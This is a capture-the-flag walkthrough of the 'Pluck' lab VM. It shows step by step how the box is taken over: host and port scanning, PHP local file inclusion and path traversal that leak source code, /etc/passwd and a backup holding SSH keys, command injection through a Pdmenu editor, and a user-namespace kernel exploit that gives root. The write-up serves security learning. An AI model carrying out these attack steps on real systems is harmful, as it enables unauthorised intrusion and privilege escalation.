First I discoverd the IP of Pluck.
root@kali:~# netdiscover -r 10.0.2.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
10.0.2.1 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.2 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.3 08:00:27:39:51:42 1 60 Cadmus Computer Systems
10.0.2.42 08:00:27:45:29:54 1 60 Cadmus Computer SystemsThen scanned the open ports.
root@kali:~# nmap -p- — script=banner 10.0.2.42
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 10.0.2.42
Host is up (0.0010s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
|_banner: SSH-2.0-OpenSSH_7.3p1 Ubuntu-1
80/tcp open http
3306/tcp open mysql
| banner: A\x00\x00\x00\xFFj\x04Host ‘10.0.2.5’ is not allowed to connect
|_ to this MySQL server
5355/tcp open unknown
MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 22.98 secondsStarted with Port80/tcp, opened the page in browser.
There was index.php and admin.php pages. Also about.php and contact.php files were opening as page parameters in index.php file.
There was no clue in source codes and dirb did not find a useful page. page parameter of the index.php gave me the idea to try to read php files with the local file inclusion vulnerability. Firstly I tried to read admin.php file for possible usernames and passwords.
Request:
GET /index.php?page=php://filter/convert.base64-encode/resource=admin.php HTTP/1.1
Host: 10.0.2.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: closeResponse:
…
</nav>
<div class=”container”>
<br><br><br><br>
<div class=jumbotron>PD9waHAKaW5jbHVkZSgiaGVhZGVyLnBocCIpOwoKZWNobyAiPGJyPjxicj48YnI+IjsKaWYgKCRfUE9TVCl7CmVjaG8gJwo8YnI+PGJyPgo8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJjb2wtbWQtOCBjb2wtbWQtb2Zmc2V0LTIiPgoKPGRpdiBjbGFzcz0iYWxlcnQgYWxlcnQtZGFuZ2VyIiByb2xlPSJhbGVydCI+JzsKIAppZihzdHJwb3MoJF9QT1NUWydlbWFpbCddLCAnXCcnKSAhPT0gZmFsc2UpIHsKCWVjaG8gICI8c3Ryb25nPllvdSBoYXZlIGFuIGVycm9yIGluIHlvdXIgU1FMIHN5bnRheDsgY2hlY2sgdGhlIG1hbnVhbCB0aGF0IGNvcnJlc3BvbmRzIHRvIHlvdXIgTXlTUUwgc2VydmVyIHZlcnNpb24gZm9yIHRoZSByaWdodCBzeW50YXggdG8gdXNlIG5lYXIgJycnIGF0IGxpbmUgNjwvc3Ryb25nPiI7Cn1lbHNlewoJZWNobyAgIjxzdHJvbmc+SW5jb3JyZWN0IFVzZXJuYW1lIG9yIFBhc3N3b3JkITwvc3Ryb25nPiI7Cn0KPz4KPC9kaXY+CjwvZGl2Pgo8L2Rpdj4KPC9kaXY+Cjw/cGhwCn0KPz4KPGJyPgo8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgPGRpdiBjbGFzcz0icm93IHZlcnRpY2FsLW9mZnNldC0xMDAiPgogICAgCTxkaXYgY2xhc3M9ImNvbC1tZC00IGNvbC1tZC1vZmZzZXQtNCI+CiAgICAJCTxkaXYgY2xhc3M9InBhbmVsIHBhbmVsLWRlZmF1bHQiPgoJCQkgIAk8ZGl2IGNsYXNzPSJwYW5lbC1oZWFkaW5nIj4KCQkJICAgIAk8aDMgY2xhc3M9InBhbmVsLXRpdGxlIj5BZG1pbjwvaDM+CgkJCSAJPC9kaXY+CgkJCSAgCTxkaXYgY2xhc3M9InBhbmVsLWJvZHkiPgoJCQkgICAgCTxmb3JtIGFjY2VwdC1jaGFyc2V0PSJVVEYtOCIgcm9sZT0iZm9ybSIgYWN0aW9uPSJhZG1pbi5waHAiIG1ldGhvZD0icG9zdCI+CiAgICAgICAgICAgICAgICAgICAgPGZpZWxkc2V0PgoJCQkgICAgCSAgCTxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAiPgoJCQkgICAgCQkgICAgPGlucHV0IGNsYXNzPSJmb3JtLWNvbnRyb2wiIHBsYWNlaG9sZGVyPSJFLW1haWwiIG5hbWU9ImVtYWlsIiB0eXBlPSJ0ZXh0Ij4KCQkJICAgIAkJPC9kaXY+CgkJCSAgICAJCTxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAiPgoJCQkgICAgCQkJPGlucHV0IGNsYXNzPSJmb3JtLWNvbnRyb2wiIHBsYWNlaG9sZGVyPSJQYXNzd29yZCIgbmFtZT0icGFzc3dvcmQiIHR5cGU9InBhc3N3b3JkIiB2YWx1ZT0iIj4KCQkJICAgIAkJPC9kaXY+CgkJCSAgICAJCTxkaXYgY2xhc3M9ImNoZWNrYm94Ij4KCQkJICAgIAkgICAgPC9kaXY+CgkJCSAgICAJCTxpbnB1dCBjbGFzcz0iYnRuIGJ0bi1sZyBidG4tc3VjY2VzcyBidG4tYmxvY2siIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4KCQkJICAgIAk8L2ZpZWxkc2V0PgoJCQkgICAgICAJPC9mb3JtPgoJCQkgICAgPC9kaXY+CgkJCTwvZGl2PgoJCTwvZGl2PgoJPC9kaXY+Cgo8P3BocAppbmNsdWRlKCJmb290ZXIucGhwIik7Cj8+Cg==</div><br> <hr>
<div class=”row”>
<div class=”col-sm-12">
<footer>
<p>© Copyright 2017 Pluck</p>
</footer>
…This request gave me the base64 decoded admin.php source code. When I decoded, I got the admin.php below.
admin.php:
<?php
include(“header.php”);
echo “<br><br><br>”;
if ($_POST){
echo ‘
<br><br>
<div class=”container”>
<div class=”row”>
<div class=”col-md-8 col-md-offset-2">
<div class=”alert alert-danger” role=”alert”>’;
if(strpos($_POST[‘email’], ‘\’’) !== false) {
echo “<strong>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 6</strong>”;
}else{
echo “<strong>Incorrect Username or Password!</strong>”;
}
?>
</div>
</div>
</div>
</div>
<?php
}
?>
<br>
<div class=”container”>
<div class=”row vertical-offset-100">
<div class=”col-md-4 col-md-offset-4">
<div class=”panel panel-default”>
<div class=”panel-heading”>
<h3 class=”panel-title”>Admin</h3>
</div>
<div class=”panel-body”>
<form accept-charset=”UTF-8" role=”form” action=”admin.php” method=”post”>
<fieldset>
<div class=”form-group”>
<input class=”form-control” placeholder=”E-mail” name=”email” type=”text”>
</div>
<div class=”form-group”>
<input class=”form-control” placeholder=”Password” name=”password” type=”password” value=””>
</div>
<div class=”checkbox”>
</div>
<input class=”btn btn-lg btn-success btn-block” type=”submit” value=”Login”>
</fieldset>
</form>
</div>
</div>
</div>
</div>
<?php
include(“footer.php”);
?>The page did not even try to login. It was only giving us static outputs depending on the input! Also I did not find anything on other php pages.
So I started nikto on port 80/tcp.
root@kali:~# nikto -h http://10.0.2.42
- Nikto v2.1.6
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Target IP: 10.0.2.42
+ Target Hostname: 10.0.2.42
+ Target Port: 80
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting…
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 12 item(s) reported on remote host
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ 1 host(s) tested
*********************************************************************
root@kali:~#Ok file traverasal. When I tried it I could see the passwd file.
There were 2 interesting things in passwd file. backup.sh and pdmenu. Started with reading the backup.sh file. This time I found a new file called backup.tar.
Then I downloaded the backup.tar file. While I was downloading I saw that it was downloading like forever. It crashed about 6.23GB. Tried a few times. Then I realized that it was downloading the same files. So I deleted the previous tries and tried to download again, this time interrupted the download about 200mb.
wget “http://10.0.2.42/index.php?page=../../../../../../../../../../../backups/backup.tar" -O backup.tarThe most important thing I saw in the backup file was keys.
root@kali:~/Desktop# tar -tvf backup.tar
tar: This does not look like a tar archive
tar: Skipping to next header
-rw-r — r — 1000/1000 0 1983–01–09 14:03 ome/bob/.sudo_as_admin_successful
tar: Skipping to next header
drwxr-xr-x root/root 0 2017–01–18 03:27 home/
drwxr-xr-x bob/bob 0 2017–01–18 07:43 home/bob/
-rw-r — r — bob/bob 3771 2017–01–18 00:39 home/bob/.bashrc
-rw-r — r — bob/bob 0 2017–01–18 03:40 home/bob/.sudo_as_admin_successful
-rw-r — r — bob/bob 655 2017–01–18 00:39 home/bob/.profile
-rw-r — r — bob/bob 220 2017–01–18 00:39 home/bob/.bash_logout
drwxr-xr-x paul/paul 0 2017–01–18 13:13 home/paul/
drwxrwxr-x paul/paul 0 2017–01–18 13:09 home/paul/keys/
-rwxrwxr-x paul/paul 600 2017–01–18 13:08 home/paul/keys/id_key3.pub
-rwxrwxr-x paul/paul 600 2017–01–18 13:08 home/paul/keys/id_key2.pub
-rwxrwxr-x paul/paul 672 2017–01–18 13:08 home/paul/keys/id_key2
-rwxrwxr-x paul/paul 392 2017–01–18 13:09 home/paul/keys/id_key4.pub
-rwxrwxr-x paul/paul 600 2017–01–18 13:08 home/paul/keys/id_key5.pub
-rwxrwxr-x paul/paul 1675 2017–01–18 13:09 home/paul/keys/id_key6
-rwxrwxr-x paul/paul 668 2017–01–18 13:08 home/paul/keys/id_key1
-rwxrwxr-x paul/paul 668 2017–01–18 13:08 home/paul/keys/id_key5
-rwxrwxr-x paul/paul 600 2017–01–18 13:08 home/paul/keys/id_key1.pub
-rwxrwxr-x paul/paul 392 2017–01–18 13:09 home/paul/keys/id_key6.pub
-rwxrwxr-x paul/paul 1679 2017–01–18 13:09 home/paul/keys/id_key4
-rwxrwxr-x paul/paul 668 2017–01–18 13:08 home/paul/keys/id_key3
-rw-r — r — paul/paul 3771 2017–01–18 03:04 home/paul/.bashrcExtracted the files in backup.tar file and tried to login to pluck with the keys in the backups. I could logged in with the 4th key.
root@kali:~/.ssh# cd /root/Desktop/home/paul/keys/
root@kali:~/Desktop/home/paul/keys# ls
id_key1 id_key2 id_key3 id_key4 id_key5 id_key6
id_key1.pub id_key2.pub id_key3.pub id_key4.pub id_key5.pub id_key6.pub
root@kali:~/Desktop/home/paul/keys# cp * /root/.ssh/
root@kali:~/Desktop/home/paul/keys# cd /root/.ssh
root@kali:~/.ssh# ls
id_key1 id_key2.pub id_key4 id_key5.pub known_hosts
id_key1.pub id_key3 id_key4.pub id_key6
id_key2 id_key3.pub id_key5 id_key6.pub
root@kali:~/.ssh#
root@kali:~/Desktop/home/paul/keys# ssh -i id_key4 paul@10.0.2.42Ssh connection directly showed us the Pdmenu.
Tried to run commands on the menus. Entered ;whoami in all menus.
In the Edit File menu I got what I want. Firstly it showed the vim page.
After I exited with :q<Enter> I saw that whoami command worked.
root@kali:~/Desktop/home/paul/keys# ssh -i id_key4 paul@10.0.2.42
Last login: from 10.0.2.5
paul
Press Enter to return to Pdmenu.Then opened bash from the menu.
root@kali:~/Desktop/home/paul/keys# ssh -i id_key4 paul@10.0.2.42
Last login: from 10.0.2.5
paul@pluck:~$It was time to get the root. As usual firstly checked the version.
paul@pluck:~$ uname -a
Linux pluck 4.8.0–22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/LinuxForgot the screen shot but also learned that it was Ubuntu 16.10 from cat /etc/lsb-release
Searched Ubuntu 16.10 for vulnerabilities and found a privilege escalation vulnerability.
I had not used this vulnerability before so searched further and found a way to exploit the vulnerability in this website.
Downloaded the files then transfered them to pluck. After that I followed the PoC in website. And I got root.
paul@pluck:~$ ls
CreateSetgidBinary.c unix-privesc-check.sh
keys SuidExec.c UserNamespaceExec.c
paul@pluck:~$ gcc -o CreateSetgidBinary CreateSetgidBinary.c
paul@pluck:~$ gcc -o UserNamespaceExec UserNamespaceExec.c
paul@pluck:~$ gcc -o SuidExec SuidExec.c
paul@pluck:~$ mkdir mnt test
paul@pluck:~$ setfacl -m “d:u:$(id -u):rwx” test
paul@pluck:~$ ./UserNamespaceExec — /bin/bash
Setting uid map in /proc/3187/uid_map
Setting gid map in /proc/3187/gid_map
euid: 0, egid: 0
euid: 0, egid: 0root@pluck:~#
